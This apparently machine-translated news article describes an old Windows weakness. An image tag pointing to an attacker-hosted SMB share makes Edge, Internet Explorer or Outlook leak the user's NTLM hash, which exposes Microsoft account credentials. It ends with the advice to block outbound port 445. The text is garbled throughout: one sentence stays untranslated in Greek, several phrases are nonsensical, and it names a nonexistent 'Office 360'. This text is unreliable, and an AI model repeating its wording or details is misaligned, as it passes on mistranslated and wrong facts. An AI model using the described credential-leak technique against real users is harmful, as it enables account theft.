The following publication is for anyone who is excited about the Windows 10 Anniversary Update. The company is expected to release the much-anticipated update today, but does not intend to insure its system that offers a serious security gap to malicious users from 1997.
A flaw in how Windows shares shared old shared network resources can leak Microsoft's user account, password, or VPN if the victim uses a VPN to surf the Internet.
The exploit επιτρέπει σε έναν εισβολέα την ενσωμάτωση ενός συνδέσμου σε ένα SMB resource (network share) μέσα σε μια ιστοσελίδα ή σε ένα e-mail που πρέπει να προβληθεί μέσω του Edge, ή Internet Explorer ή του Outlook αντίστοιχα.
The attacker can disguise the connection to the shared network element that uses inside image tags, and instead of the proper link to the image, it can place a link of a network share hosted on its own network.
When a user opens this connection through Internet Explorer, Edge, or Outlook, due to the way Windows handles public authentication networks, their computer will automatically send their login credentials for authentication to the scammer's computer.
The Microsoft account password does not run in plain text, but with NTLM hash. Researchers have long proved that these hashes can easily break.
The issue we described above is not new and not just Windows 10. Microsoft and the research community are aware of this issue from 1997 and are often discussed at security conferences, such as Black Hat.
But what has changed since Windows 8 is that Microsoft has begun to allow users to authenticate to their computers with Microsoft accounts.
In Windows 10, this has become the de facto method for authentication, which means that more users have started using it.
In recent years, Microsoft has begun to connect all of its online services with the user's Microsoft account.
Thus, according to ProstoVPN's ValdikSS, this old attack allows fraudsters to obtain the credentials of Microsoft accounts that grant indirect access to all of the company's services: Windows 10, Skype, Xbox, OneDrive, Office 360, MSN, Bing, Azure, and many others.
ValdikSS reports that the easiest way to protect yourself from such attacks is by blocking all outgoing SMB connections (the 445 port) through the Windows Firewall, except for local networks.